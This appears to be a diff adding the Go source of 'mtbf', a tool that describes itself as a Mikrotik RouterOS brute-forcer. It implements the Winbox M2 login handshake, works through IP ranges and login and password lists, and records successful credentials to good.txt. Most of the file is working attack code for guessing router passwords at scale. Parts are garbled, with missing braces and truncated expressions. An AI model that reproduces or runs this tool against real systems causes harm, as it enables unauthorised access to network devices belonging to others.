CfgRegister("max-proto-errors", 20, "always remove endpoint after this many consecutive protocol errors")
CfgRegister("min-proto-errors", 4, "do not consider removing an endpoint if it does not have this many consecutive protocol errors")
CfgRegister("read-error-ratio", 0.25, "keep endpoints with a read error if their read error ratio is lower than this value")
CfgRegister("max-read-errors", 20, "always remove endpoint after this many consecutive read errors")
CfgRegister("min-read-errors", 3, "do not consider removing an endpoint if it does not have this many consecutive read errors")
CfgRegister("no-response-delay-ms", 2000, "wait for this number of ms if an endpoint does not respond")
CfgRegister("read-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a read error")
CfgRegister("protocol-error-delay-ms", 5000, "wait for this number of ms if an endpoint returns a protocol error")

@ -0,0 +1,5 @@
module mtbf
go 1.18
require v1.18.1

@ -0,0 +1,2 @@ v1.18.1 h1:FXtiHYKDGKCW2KzwZKx0iC0PQmdlorYgdFG9jPXJ1Bc= v1.18.1/go.mod h1:8tpGGwCnJ5H4r6BWwaV6OrWmMoPhUl5jm/FMNAnJvWQ=

@ -0,0 +1,439 @@
package main
import (
const MT_BOOL_FALSE byte = 0x00
const MT_BOOL_TRUE byte = 0x01
const MT_DWORD byte = 0x08
const MT_BYTE byte = 0x09
const MT_STRING byte = 0x21
const MT_HASH byte = 0x31
const MT_ARRAY byte = 0x88
const MT_RECEIVER = 0xFF0001
const MT_SENDER = 0xFF0002
const MT_REPLY_EXPECTED = 0xFF0005
const MT_REQUEST_ID = 0xFF0006
const MT_COMMAND = 0xFF0007
type M2Element struct {
code int
value interface{}
func (el *M2Element) String() string {
return fmt.Sprintf("code=%v,type=%T,value=%v", el.code, el.value, el.value)
type M2Message struct {
el []M2Element
type M2Hash string
func NewM2Message() *M2Message {
m2 := M2Message{}
return &m2
func (m2 *M2Message) Clear() {
m2.el = []M2Element{}
func (m2 *M2Message) Append(code int, value interface{}) {
if m2.el == nil {
m2.el = append(m2.el, M2Element{code: code, value: value})
func (m2 *M2Message) AppendElement(el *M2Element) {
if m2.el == nil {
m2.el = append(m2.el, *el)
func (m2 *M2Message) Bytes() []byte {
res := []byte{}
for _, el := range m2.el {
buf := new(bytes.Buffer)
binary.Write(buf, binary.LittleEndian, uint16(el.code))
binary.Write(buf, binary.LittleEndian, byte(el.code >> 16))
switch v := el.value.(type) {
case bool:
binary.Write(buf, binary.LittleEndian, v)
case byte:
binary.Write(buf, binary.LittleEndian, byte(MT_BYTE))
binary.Write(buf, binary.LittleEndian, v)
case int:
binary.Write(buf, binary.LittleEndian, byte(MT_DWORD))
binary.Write(buf, binary.LittleEndian, int32(v))
case uint:
binary.Write(buf, binary.LittleEndian, byte(MT_DWORD))
binary.Write(buf, binary.LittleEndian, uint32(v))
case string:
binary.Write(buf, binary.LittleEndian, byte(MT_STRING))
binary.Write(buf, binary.LittleEndian, byte(len(v)))
binary.Write(buf, binary.LittleEndian, []byte(v))
case M2Hash:
binary.Write(buf, binary.LittleEndian, byte(MT_HASH))
binary.Write(buf, binary.LittleEndian, byte(len(v)))
binary.Write(buf, binary.LittleEndian, []byte(v))
case []byte:
binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY))
binary.Write(buf, binary.LittleEndian, uint16(len(v)))
for _, i := range v {
binary.Write(buf, binary.LittleEndian, int32(i))
case []int:
binary.Write(buf, binary.LittleEndian, byte(MT_ARRAY))
binary.Write(buf, binary.LittleEndian, uint16(len(v)))
for _, i := range v {
binary.Write(buf, binary.LittleEndian, int32(i))
res = append(res, buf.Bytes()...)
header := make([]byte, 6)
header[0] = byte(len(res) + 4)
header[1] = 0x01
header[2] = 0x00
header[3] = byte(len(res) + 2)
header[4] = 0x4D
header[5] = 0x32
return append(header, res...)
func (m2 *M2Message) ParseM2Element(buf io.Reader) error {
var codeAndType uint32
err := binary.Read(buf, binary.LittleEndian, &codeAndType)
if err != nil {
return err
el := M2Element{code: int(codeAndType & 0x00FFFFFF)}
keyType := byte(codeAndType >> 24)
log("lw", 3, "m2 code=%v type=%v", el.code, keyType)
switch keyType {
el.value = keyType == MT_BOOL_TRUE
log("lw", 3, "m2 MT_BOOL: %v", el.value.(bool))
case MT_BYTE:
var b byte
err = binary.Read(buf, binary.LittleEndian, &b)
el.value = b
log("lw", 3, "m2 MT_BYTE: %v", el.value.(byte))
case MT_DWORD:
var b int32
err = binary.Read(buf, binary.LittleEndian, &b)
el.value = b
log("lw", 3, "m2 MT_DWORD: %v", el.value.(int32))
var length byte
err = binary.Read(buf, binary.LittleEndian, &length)
if err != nil {
return err
bs := make([]byte, length)
_, err = io.ReadFull(buf, bs)
el.value = string(bs)
log("lw", 3, "m2 MT_STRING (len %v): %v", length, el.value.(string))
case MT_HASH:
var length byte
err = binary.Read(buf, binary.LittleEndian, &length)
if err != nil {
return err
bs := make([]byte, length)
_, err = io.ReadFull(buf, bs)
el.value = M2Hash(bs)
log("lw", 3, "m2 MT_HASH (len %v): %v", length, []byte(el.value.(M2Hash)))
case MT_ARRAY:
var length uint16
err = binary.Read(buf, binary.LittleEndian, &length)
if err != nil {
return err
sl := []int{}
for i := 0; i < int(length); i++ {
var el2 int32
err = binary.Read(buf, binary.LittleEndian, &el2)
if err != nil {
sl = append(sl, int(el2))
el.value = sl
log("lw", 3, "m2 MT_HASH (len %v): %v", length, el.value.([]int))
return errors.New("unknown key code " + strconv.Itoa(int(keyType)))
if err != nil {
return err
m2.el = append(m2.el, el)
return nil
func (m2 *M2Message) ParseM2Message(buf io.Reader) error {
var headerBlockSize, m2BlockSize byte
var m2Extra, m2Header uint16
err := binary.Read(buf, binary.LittleEndian, &headerBlockSize)
err = binary.Read(buf, binary.LittleEndian, &m2Extra)
err = binary.Read(buf, binary.LittleEndian, &m2BlockSize)
err = binary.Read(buf, binary.LittleEndian, &m2Header)
if err != nil {
return err
if m2Extra != 0x1 {
return errors.New("invalid M2_EXTRA")
if m2Header != 0x324D {
return errors.New("invalid M2_HEADER")
for {
log("lw", 3, "parsing new m2 element")
err := m2.ParseM2Element(buf)
if err != nil {
return err
func ParseM2Messages(src []byte) (messages []M2Message, err error) {
messages = []M2Message{}
buf := bytes.NewReader(src)
for {
m2 := NewM2Message()
err := m2.ParseM2Message(buf)
if err == io.EOF {
messages = append(messages, *m2)
} else if err != nil {
return nil, err
} else {
messages = append(messages, *m2)
log("lw", 3, "m2 eof after %v messages", len(messages))
return messages, nil
type LegacyWinbox struct {
task *Task
stage int
m2 []M2Message
func NewLegacyWinbox(task *Task) *LegacyWinbox {
lw := LegacyWinbox{task: task, stage: -1, m2: []M2Message{}}
return &lw
// req1
func (lw *LegacyWinbox) MTReqList() []byte {
m2 := NewM2Message()
m2.Append(MT_RECEIVER, []byte{2, 2})
m2.Append(MT_COMMAND, byte(7))
m2.Append(MT_REQUEST_ID, byte(1))
m2.Append(MT_REPLY_EXPECTED, true)
m2.Append(1, "list")
return m2.Bytes()
// res1
func (lw *LegacyWinbox) MTGetSid(m2 []M2Message) *M2Element {
for _, msg := range m2 {
for _, el := range msg.el {
if el.code == 0xFE0001 {
return &el
return nil
// req2
func (lw *LegacyWinbox) MTReqChallenge(sid *M2Element) []byte {
m2 := NewM2Message()
m2.Append(MT_RECEIVER, []byte{13, 4})
m2.Append(MT_COMMAND, byte(4))
m2.Append(MT_REQUEST_ID, byte(2))
m2.Append(MT_REPLY_EXPECTED, true)
return m2.Bytes()
// res2
func (lw *LegacyWinbox) MTGetSalt(m2 []M2Message) M2Hash {
for _, msg := range m2 {
for _, el := range msg.el {
if el.code == 0x9 {
return el.value.(M2Hash)
return ""
// req3
func (lw *LegacyWinbox) MTReqAuth(sid *M2Element, login, digest, salt string) []byte {
m2 := NewM2Message()
m2.Append(MT_RECEIVER, []byte{13, 4})
m2.Append(MT_COMMAND, byte(1))
m2.Append(MT_REQUEST_ID, byte(3))
m2.Append(MT_REPLY_EXPECTED, true)
m2.Append(1, login)
m2.Append(9, M2Hash(salt))
m2.Append(10, M2Hash(digest))
return m2.Bytes()
// res3
func (lw *LegacyWinbox) MTGetResult(m2 []M2Message) (res bool, err error) {
for _, msg := range m2 {
for _, el := range msg.el {
if el.code == 0xA {
_, ok := el.value.(M2Hash)
if ok {
return true, nil
} else if el.code == 0xFF0008 {
v, ok := el.value.(int32)
if ok && v == 0xFE0006 {
return false, nil
return false, errors.New("no auth marker found")
func (lw *LegacyWinbox) SendRecv(buf []byte) (res []byte, err error) {
_, err = lw.task.conn.Write(buf)
if err != nil {
log("lw", 1, "failed to send: %v", err.Error())
return nil, err
resp := make([]byte, 1024)
n, err := lw.task.conn.Read(resp)
if err != nil {
log("lw", 1, "failed to recv: %v", err.Error())
return nil, err
return resp[:n], nil
func (lw *LegacyWinbox) TryLogin() (res bool, err error) {
log("lw", 2, "login: stage 1, req_list")
r1, err := lw.SendRecv(lw.MTReqList())
if err != nil {
return false, err
log("lw", 2, "login: stage 2, got response for req_list")
msg, err := ParseM2Messages(r1)
if err != nil {
return false, err
sid := lw.MTGetSid(msg)
if sid == nil {
return false, errors.New("failed to get SID from stage 2")
log("lw", 2, "login: stage 2, sid %v", sid.String())
r2, err := lw.SendRecv(lw.MTReqChallenge(sid))
if err != nil {
return false, err
log("lw", 2, "login: stage 3, got response for req_challenge")
log("lw", 2, "r2: %v", r2)
msg, err = ParseM2Messages(r2)
if err != nil {
return false, err
salt := lw.MTGetSalt(msg)
if salt == "" {
return false, errors.New("failed to get salt from stage 3")
sl := []byte{0}
sl = append(sl, []byte(lw.task.password)...)
sl = append(sl, []byte(salt)...)
d := md5.Sum(sl)
digest := append([]byte{0}, d[:]...)
log("lw", 2, "login: stage 3, hash %v", digest)
r3, err := lw.SendRecv(lw.MTReqAuth(sid, lw.task.login, string(digest), string(salt)))
if err != nil {
return false, err
log("lw", 2, "login: stage 4, got response for req_salt")
msg, err = ParseM2Messages(r3)
if err != nil {
return false, err
res, err = lw.MTGetResult(msg)
log("lw", 2, "login: stage 5: res=%v err=%v", res, err)
return res, err

@ -0,0 +1,91 @@
package main
import (
func shouldLog(facility string, level, maxLevel int) bool {
moduleMap := CfgGet("log-module-map").(map[string]bool)
logModule, ok := moduleMap[strings.ToLower(facility)]
if ok {
return logModule
if maxLevel < 0 {
return true // log everything if log-level is -1
return maxLevel >= level
func log(facility string, level int, s string, params ...interface{}) {
maxLevel := CfgGetInt("log-level")
if !shouldLog(facility, level, maxLevel) {
var prefix = ""
if level > 0 {
prefix = strings.Repeat("-", level) + "> "
if (maxLevel >= 2 || maxLevel < 0) && facility != "" {
prefix = prefix + "[" + strings.ToUpper(facility) + "]: "
if len(params) == 0 {
fmt.Printf(prefix + s + "\n")
} else {
fmt.Printf(prefix+s+"\n", params...)
func fail(s string, params ...interface{}) {
if len(params) == 0 {
fmt.Fprintf(os.Stderr, "ERROR: "+s+"\n")
} else {
fmt.Fprintf(os.Stderr, "ERROR: "+s+"\n", params...)
func logIf(condition bool, facility string, level int, s string, params ...interface{}) {
if condition {
log(facility, level, s, params...)
func failIf(condition bool, s string, params ...interface{}) {
if condition {
fail(s, params...)
func updateModuleMap() {
logModules := CfgGet("log-modules").([]string)
noLogModules := CfgGet("no-log-modules").([]string)
newMap := map[string]bool{}
for _, module := range logModules {
module = strings.ToLower(module)
newMap[module] = true
for _, module := range noLogModules {
module = strings.ToLower(module)
failIf(newMap[module] == true, "log module \"%v\" is defined both in log-modules and no-log-modules", module)
newMap[module] = false
CfgSet("log-module-map", newMap)
func init() {
CfgRegister("log-level", 0, "max log level, useful for debugging. -1 logs everything")
CfgRegisterCallback("log-modules", []string{}, "always log output from these modules", updateModuleMap)
CfgRegisterCallback("no-log-modules", []string{}, "never log output from these modules", updateModuleMap)
CfgRegisterHidden("log-module-map", map[string]bool{})

@ -0,0 +1,132 @@
package main
import (
_ "fmt"
func powInt(x, y int) int {
return int(math.Pow(float64(x), float64(y)))
func egcd(a, b bigint) (g, x, y bigint) {
if a.Empty() {
return b, NewBigint(0), NewBigint(1)
} else {
g, y, x = egcd(b.Mod(a), a)
return g, x.Sub(b.Div(a).Mul(y)), y
func modinv(a, p bigint) bigint {
if a.LtInt(0) {
a = a.Mod(p)
g, x, _ := egcd(a, p)
if g.NeInt(1) {
panic("modular inverse does not exist")
} else {
return x.Mod(p)
func leftmostBit(x bigint) bigint {
if x.LteInt(0) {
panic("x must be greater than 0")
res := NewBigint(1)
for res.Lte(x) {
res = res.MulInt(2)
return res.DivInt(2)
func naf(mult bigint) []bigint {
ret := make([]bigint, 0)
for mult.GtInt(0) {
if mult.ModInt(2).GtInt(0) {
nd := mult.ModInt(4)
if nd.GteInt(2) {
nd = nd.SubInt(4)
ret = append(ret, nd)
mult = mult.Sub(nd)
} else {
ret = append(ret, NewBigint(0))
mult = mult.DivInt(2)
return ret
func legendreSymbol(a, p bigint) bigint {
l := a.ModExp(p.SubInt(1).DivInt(2), p)
if l.Eq(p.SubInt(1)) {
return NewBigint(-1)
} else {
return l
func primeModSqrt(a, p bigint) (bigint, bigint) {
a = a.Mod(p)
if a.EqInt(0) {
return NewBigint(0), NewEmptyBigint()
if p.EqInt(2) {
return a, NewEmptyBigint()
if legendreSymbol(a, p).NeInt(1) {
return NewEmptyBigint(), NewEmptyBigint()
if p.ModInt(4).EqInt(3) {
x := a.ModExp(p.AddInt(1).DivInt(4), p)
return x, p.Sub(x)
q, s := p.SubInt(1), 0
for q.ModInt(2).EqInt(0) {
q = q.DivInt(2)
z := NewBigint(1)
for legendreSymbol(z, p).NeInt(-1) {
z = z.AddInt(1)
c := z.ModExp(q, p)
x := a.ModExp(q.AddInt(1).DivInt(2), p)
t := a.ModExp(q, p)
m := s
for t.NeInt(1) {
i, e := 0, NewBigint(2)
if m > 0 {
for i = 1; i < m; i++ {
if t.ModExp(e, p).EqInt(1) {
e = e.MulInt(2)
b := c.ModExp(NewBigint(powInt(2, m-i-1)), p)
x = x.Mul(b).Mod(p)
t = t.Mul(b).Mul(b).Mod(p)
c = b.Mul(b).Mod(p)
m = i
return x, p.Sub(x)

@ -0,0 +1,16 @@
package main
func main() {
log("main", 0, "mtbf: Mikrotik RouterOS bruteforce | v1.0.1")
defer CloseOutFile()
defer CloseSources()
wg := InitializeThreads()
log("main", 0, "finished")

@ -0,0 +1,384 @@
package main
import (
_ "fmt"
type Point struct {
curve *WCurve
x, y bigint
order bigint
var InfinityPoint *Point = NewInfPoint()
func NewPoint(curve *WCurve, x, y, order bigint) *Point {
point := Point{}
point.x = x
point.y = y
point.order = order
/*if curve != nil && !curve.containsPoint(x, y) {
panic("point is not on a curve")
/*if curve != nil && curve.h.NeInt(1) && !order.Empty() {
if point.Mul(order).Eq(InfinityPoint) {
panic("point is not a scalar multiple")
return &point
func NewInfPoint() *Point {
return NewPoint(nil, NewEmptyBigint(), NewEmptyBigint(), NewEmptyBigint())
func (self *Point) IsInf() bool {
return self.curve == nil && self.x.Empty() && self.y.Empty()
func (self *Point) Eq(other *Point) bool {
eqCurve := self.curve != nil && other.curve != nil && self.curve.Eq(other.curve)
eqX := !self.x.Empty() && !other.x.Empty() && self.x.Eq(other.x)
eqY := !self.y.Empty() && !other.y.Empty() && self.y.Eq(other.y)
if self.IsInf() && other.IsInf() {
return true
return eqCurve && eqX && eqY
func (self *Point) Neg() *Point {
return NewPoint(self.curve, self.x, self.curve.p.Sub(self.y), NewEmptyBigint())
func (self *Point) Add(other *Point) *Point {
if other.Eq(InfinityPoint) {
return self
if self.Eq(InfinityPoint) {
return other
if !self.curve.Eq(other.curve) {
panic("cannot add points on different curves")
if self.x.Eq(other.x) {
if self.y.Add(other.y).Mod(self.curve.p).EqInt(0) {
return NewInfPoint()
} else {
return self.Double()
p := self.curve.p
im := modinv(other.x.Sub(self.x), p)
l := other.y.Sub(self.y).Mul(im).Mod(p)
x3 := l.Mul(l).Sub(self.x).Sub(other.x).Mod(p)
y3 := l.Mul(self.x.Sub(x3)).Sub(self.y).Mod(p)
return NewPoint(self.curve, x3, y3, NewEmptyBigint())
func (self *Point) Mul(other bigint) *Point {
e := other
if e.EqInt(0) || (!self.order.Empty() && e.Mod(self.order).EqInt(0)) {
return NewInfPoint()
if self.Eq(InfinityPoint) {
return NewInfPoint()
if e.LtInt(0) {
return self.Neg().Mul(e.Neg())
e3 := e.MulInt(3)
negativeSelf := NewPoint(self.curve, self.x, self.y.Neg(), self.order)
i := leftmostBit(e3).DivInt(2)
res := self
for i.GtInt(1) {
res = res.Double()
if !e3.And(i).EqInt(0) && e.And(i).EqInt(0) {
res = res.Add(self)
if e3.And(i).EqInt(0) && !e.And(i).EqInt(0) {
res = res.Add(negativeSelf)
i = i.DivInt(2)
return res
func (self *Point) Double() *Point {
if self.Eq(InfinityPoint) {
return NewInfPoint()
p := self.curve.p
a := self.curve.a
im := modinv(self.y.MulInt(2), p)
l := self.x.MulInt(3).Mul(self.x).Add(a).Mul(im).Mod(p)
x3 := l.Mul(l).Sub(self.x.MulInt(2)).Mod(p)
y3 := l.Mul(self.x.Sub(x3)).Sub(self.y).Mod(p)
return NewPoint(self.curve, x3, y3, NewEmptyBigint())
type JacobiPoint struct {
curve *WCurve
x, y, z bigint
order bigint
func NewJacobiPoint(curve *WCurve, x, y, z, order bigint) *JacobiPoint {
// attempt to initialize normal point
NewPoint(curve, x, y, order)
point := JacobiPoint{}
point.x = x
point.y = y
point.z = z
point.curve = curve
point.order = order
return &point
func NewInfJacobiPoint() *JacobiPoint {
return NewJacobiPoint(nil, NewEmptyBigint(), NewEmptyBigint(), NewEmptyBigint(), NewEmptyBigint())
func (self *JacobiPoint) IsInf() bool {
return self.curve == nil && self.x.Empty() && self.y.Empty() && self.z.Empty()
func (self *JacobiPoint) EqCoords(x2, y2, z2 bigint) bool {
x1 := self.x
y1 := self.y
z1 := self.z
p := self.curve.p
zz1 := z1.Mul(z1).Mod(p)
zz2 := z2.Mul(z2).Mod(p)
m1 := x1.Mul(zz2).Sub(x2.Mul(zz1)).Mod(p)
m2 := y1.Mul(zz2).Mul(z2).Sub(y2.Mul(zz1).Mul(z1)).Mod(p)
return m1.EqInt(0) && m2.EqInt(0)
func (self *JacobiPoint) EqPoint(other *Point) bool {
if other.IsInf() {
return self.y.Empty() || self.z.Empty()
if !self.curve.Eq(other.curve) {
return false
return self.EqCoords(other.x, other.y, NewBigint(1))
func (self *JacobiPoint) Eq(other *JacobiPoint) bool {
if other.IsInf() {
return self.y.Empty() || self.z.Empty()
if !self.curve.Eq(other.curve) {
return false
return self.EqCoords(other.x, other.y, other.z)
func (self *JacobiPoint) Neg() *JacobiPoint {
return NewJacobiPoint(self.curve, self.x, self.y.Neg(), self.z, self.order)
func (self *JacobiPoint) AffineX() bigint {
if self.z.EqInt(1) {
return self.x
z := modinv(self.z, self.curve.p)
return self.x.Mul(z.Mul(z)).Mod(self.curve.p)
func (self *JacobiPoint) AffineY() bigint {
if self.z.EqInt(1) {
return self.y
z := modinv(self.z, self.curve.p)
return self.y.Mul(z.Mul(z).Mul(z)).Mod(self.curve.p)
// modifies in-place
func (self *JacobiPoint) Scale() *JacobiPoint {
if self.z.EqInt(1) {
return self
p := self.curve.p
zInv := modinv(self.z, p)
zzInv := zInv.Mul(zInv).Mod(p)
x := self.x.Mul(zzInv).Mod(p)
y := self.y.Mul(zzInv).Mul(zInv).Mod(p)
self.x = x
self.y = y
self.z = NewBigint(1)
return self
func (self *JacobiPoint) ToAffine() *Point {
if self.y.Empty() || self.z.Empty() {
return NewInfPoint()
return NewPoint(self.curve, self.x, self.y, self.order)
func (self *Point) FromAffine() *JacobiPoint {
return NewJacobiPoint(self.curve, self.x, self.y, NewBigint(1), self.order)
func (self *JacobiPoint) _Double(x1, y1, z1, p, a bigint) (t, y3, z3 bigint) {
if y1.Empty() || z1.Empty() {
return NewBigint(0), NewBigint(0), NewBigint(1)
xx, yy := x1.Mul(x1).Mod(p), y1.Mul(y1).Mod(p)
if yy.Empty() {
return NewBigint(0), NewBigint(0), NewBigint(1)
yyyy := yy.Mul(yy).Mod(p)
zz := z1.Mul(z1).Mod(p)
s := NewBigint(2).Mul(x1.Add(yy).Mul(x1.Add(yy)).Sub(xx).Sub(yyyy)).Mod(p)
m := NewBigint(3).Mul(xx).Add(a.Mul(zz).Mul(zz)).Mod(p)
t = m.Mul(m).Sub(NewBigint(2).Mul(s)).Mod(p)
y3 = m.Mul(s.Sub(t)).Sub(NewBigint(8).Mul(yyyy)).Mod(p)
z3 = y1.Add(z1).Mul(y1.Add(z1)).Sub(yy).Sub(zz).Mod(p)
return t, y3, z3
func (self *JacobiPoint) Double() *JacobiPoint {
if self.y.Empty() {
return NewInfJacobiPoint()
x3, y3, z3 := self._Double(self.x, self.y, self.z, self.curve.p, self.curve.a)
if y3.Empty() || z3.Empty() {
return NewInfJacobiPoint()
return NewJacobiPoint(self.curve, x3, y3, z3, self.order)
func (self *JacobiPoint) _Add(x1, y1, z1, x2, y2, z2, p bigint) (x3, y3, z3 bigint) {
if y1.Empty() || z1.Empty() {
return x2, y2, z2
if y2.Empty() || z2.Empty() {
return x1, y1, z1
z1z1 := z1.Mul(z1).Mod(p)
z2z2 := z2.Mul(z2).Mod(p)
u1 := x1.Mul(z2z2).Mod(p)
u2 := x2.Mul(z1z1).Mod(p)
s1 := y1.Mul(z2).Mul(z2z2).Mod(p)
s2 := y2.Mul(z1).Mul(z1z1).Mod(p)
h := u2.Sub(u1)
i := NewBigint(4).Mul(h).Mul(h).Mod(p)
j := h.Mul(i).Mod(p)
r := NewBigint(2).Mul(s2.Sub(s1)).Mod(p)
if h.Empty() && r.Empty() {
return self._Double(x1, y1, z1, p, self.curve.a)
v := u1.Mul(i)
x3 = r.Mul(r).Sub(j).Sub(NewBigint(2).Mul(v)).Mod(p)
y3 = r.Mul(v.Sub(x3)).Sub(NewBigint(2).Mul(s1).Mul(j)).Mod(p)
z3 = z1.Add(z2).Mul(z1.Add(z2)).Sub(z1z1).Sub(z2z2).Mul(h).Mod(p)
return x3, y3, z3
func (self *JacobiPoint) AddPoint(other *Point) *JacobiPoint {
return self.Add(other.FromAffine())
func (self *JacobiPoint) Add(other *JacobiPoint) *JacobiPoint {
if other.IsInf() {
return self
if self.IsInf() {
return other
if !self.curve.Eq(other.curve) {
panic("cannot add with different curves")
x3, y3, z3 := self._Add(self.x, self.y, self.z, other.x, other.y, other.z, self.curve.p)
if y3.Empty() || z3.Empty() {
return NewInfJacobiPoint()
return NewJacobiPoint(self.curve, x3, y3, z3, self.order)
func (self *JacobiPoint) Mul(other bigint) *JacobiPoint {
if self.y.Empty() || other.Empty() {
return NewInfJacobiPoint()
if other.EqInt(1) {
return self
if !self.order.Empty() {
other = other.Mod(self.order.MulInt(2))
self = self.Scale()
x2, y2 := self.x, self.y
x3, y3, z3 := NewBigint(0), NewBigint(0), NewBigint(1)
p, a := self.curve.p, self.curve.a
nf := naf(other)
for i := len(nf) - 1; i >= 0; i-- {
x3, y3, z3 = self._Double(x3, y3, z3, p, a)
if nf[i].LtInt(0) {
x3, y3, z3 = self._Add(x3, y3, z3, x2, y2.Neg(), NewBigint(1), p)
} else if nf[i].GtInt(0) {
x3, y3, z3 = self._Add(x3, y3, z3, x2, y2, NewBigint(1), p)
if y3.Empty() || z3.Empty() {
return NewInfJacobiPoint()
return NewJacobiPoint(self.curve, x3, y3, z3, self.order)
func (self *JacobiPoint) MulAdd(selfMul bigint, other *JacobiPoint, otherMul bigint) *JacobiPoint {
return self.Mul(selfMul).Add(other.Mul(otherMul))

@ -0,0 +1,46 @@
package main
import (
var outFile *os.File
func RegisterResult(t *Task, good bool) {
if good {
log("res", 0, "****************\n******** OK: %v %v %v\n****************", t.e.String(), t.login, t.password)
if outFile != nil {
fmt.Fprintf(outFile, "%v\t%v\t%v\n", t.e.String(), t.login, t.password)
} else {
log("res", 1, "bad: %v %v %v", t.e.String(), t.login, t.password)
func OpenOutFile() {
fileName := CfgGetString("out-file")
if fileName == "" {
log("out", 0, "WARNING: out-file is not specified, results will only be logged in console")
outFile = nil
} else {
var err error
outFile, err = os.OpenFile(fileName, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
fail("error opening output file \"%v\": %v", fileName, err.Error())
log("out", 2, "opened output file \"%v\"", fileName)
func CloseOutFile() {
outFile = nil
func init() {
CfgRegister("out-file", "good.txt", "results will be saved in this file")
CfgRegisterAlias("o", "out-file")

@ -0,0 +1,29 @@
package main
import (
// TODO: multiple services...
func TryLogin(task *Task, conn net.Conn) (res bool, err error) {
defer func() {
if r := recover(); r != nil {
log("srv", 1, "fatal error (panic) in service handler: %v", r)
res = false
switch x := r.(type) {
case string:
err = errors.New(x)
case error:
err = x
err = errors.New("unknown error")
res, err = NewWinbox(task, conn).TryLogin()
return res, err

@ -0,0 +1,288 @@
package main
import (
type Source struct {
name, plainParmName, filesParmName string
validator func(item string) (string, error)
plain []string
files []*os.File
fileNames []string
contents []string
fetchMutex sync.Mutex
// both -1: exhausted
// both 0: not started yet
type SourcePos struct {
plainIdx int
contentIdx int
func (pos *SourcePos) String() string {
return "P" + strconv.Itoa(pos.plainIdx) + "/C" + strconv.Itoa(pos.contentIdx)
func (pos *SourcePos) Exhausted() bool {
return pos.plainIdx == -1 && pos.contentIdx == -1
func ipValidator(item string) (res string, err error) {
return item, nil
func passwordValidator(item string) (res string, err error) {
if CfgGetSwitch("no-password-trim") {
return item, nil
} else {
return strings.TrimSpace(item), nil
var SrcIP Source = Source{name: "ip", plainParmName: "ip", filesParmName: "ip-file"}
var SrcLogin Source = Source{name: "login", plainParmName: "login", filesParmName: "login-file"}
var SrcPassword Source = Source{name: "password", plainParmName: "password",
filesParmName: "password-file", validator: passwordValidator}
func (src *Source) validate(item string) (res string, err error) {
if src.validator != nil {
res, err := src.validator(item)
if err != nil {
log("src", 1, "error validating %v \"%v\": %v",, item, err.Error())
return res, err
} else {
return item, nil
func (src *Source) parsePlain() {
if src.plain == nil {
src.plain = []string{}
for _, plain := range CfgGetStringSlice(src.plainParmName) {
var err error
plain, err = src.validate(plain)
if err != nil {
src.plain = append(src.plain, plain)
if len(src.plain) > 0 {
log("src", 1, "parsed %v %v items", len(src.plain),
func (src *Source) openFiles() {
if src.files == nil {
src.files = []*os.File{}
if src.fileNames == nil {
src.fileNames = []string{}
fileNames := CfgGetStringSlice(src.filesParmName)
for _, fileName := range fileNames {
f, err := os.Open(fileName)
if err != nil {
fail("error opening source file \"%v\": %v", fileName, err.Error())
src.files = append(src.files, f)
src.fileNames = append(src.fileNames, fileName)
if len(src.files) > 0 {
log("src", 1, "opened %v %v files", len(src.files),
// this parses all source files
func (src *Source) parseFiles() {
if src.contents == nil {
src.contents = []string{}
for i, file := range src.files {
fileName := src.fileNames[i]
log("src", 1, "parsing %v", fileName)
thisTotal := 0
scanner := bufio.NewScanner(file)
for scanner.Scan() {
text := scanner.Text()
if text == "" {
value, err := src.validate(text)
if err != nil {
src.contents = append(src.contents, value)
scannerErr := scanner.Err()
failIf(scannerErr != nil, "error reading source file \"%v\": %v", fileName, scannerErr)
log("src", 1, "ok: parsed %v, got %v contents, %v total", fileName, thisTotal, len(src.contents))
func (src *Source) failIfEmpty() {
failIf(len(src.contents)+len(src.plain) == 0, "no %vs defined: check %v and %v parameters",, src.plainParmName, src.filesParmName)
func (src *Source) reportLoaded() {
log("src", 0, "loaded %vs: %v items from commandline and %v items from files",, len(src.plain), len(src.contents))
func (src *Source) load(wg *sync.WaitGroup) {
if wg != nil {
defer wg.Done()
if == "password" && CfgGetSwitch("add-empty-password") {
if src.plain == nil {
src.plain = []string{}
src.plain = append(src.plain, "")
defer src.closeFiles()
func (src *Source) closeFiles() {
l := len(src.files)
for _, file := range src.files {
if file != nil {
src.files = []*os.File{}
src.fileNames = []string{}
log("src", 1, "closed all %v %v files", l,
func (src *Source) fetchFromSlice(name string, idx *int, slice []string, inc bool) (res string, empty bool) {
if *idx == -1 {
// exhausted
log("src", 3, "fetch %v from %v: idx is -1, return empty",, name)
return "", true
if *idx >= len(slice) {
log("src", 3, "fetch %v from %v: idx >= slice length (%v >= %v), marking as exhausted, return empty",, name, *idx, len(slice))
*idx = -1
return "", true
res = slice[*idx]
log("src", 3, "fetch %v from %v: ok, got %v at idx %v",, name, res, *idx)
if inc {
*idx = *idx + 1
log("src", 3, "fetch %v from %v: incrementing idx to %v",, name, *idx)
return res, false
// retrieves an item from source
// increments pos
func (src *Source) FetchOne(pos *SourcePos, inc bool) (res string, empty bool) {
defer src.fetchMutex.Unlock()
if CfgGetSwitch("file-contents-first") {
res, empty = src.fetchFromSlice("contents", &pos.contentIdx, src.contents, inc)
if empty {
res, empty = src.fetchFromSlice("plain", &pos.plainIdx, src.plain, inc)
} else {
res, empty = src.fetchFromSlice("plain", &pos.plainIdx, src.plain, inc)
if empty {
res, empty = src.fetchFromSlice("contents", &pos.contentIdx, src.contents, inc)
logIf(empty, "src", 2, "exhausted source %v for pos %v",, pos.String())
return res, empty
func (pos *SourcePos) Reset() {
pos.plainIdx = 0
pos.contentIdx = 0
log("src", 3, "resetting source pos")
func LoadSources() {
log("src", 1, "loading sources")
var wg sync.WaitGroup
go SrcIP.load(&wg)
go SrcLogin.load(&wg)
go SrcPassword.load(&wg)
// TODO: dynamic loading of contents
// currently this just dumps everything to a slice
log("src", 1, "ok: finished loading sources")
func CloseSources() {
log("src", 1, "closing sources")
log("src", 1, "ok: finished closing sources")
func init() {
CfgRegister("ip", []string{}, "IPs or subnets in CIDR notation")
CfgRegister("ip-file", []string{}, "paths to files with IPs or subnets in CIDR notation (one entry per line)")
CfgRegister("login", []string{}, "one or more logins")
CfgRegister("login-file", []string{}, "paths to files with logins (one entry per line)")
CfgRegister("password", []string{}, "one or more passwords")
CfgRegister("password-file", []string{}, "paths to files with passwords (one entry per line)")
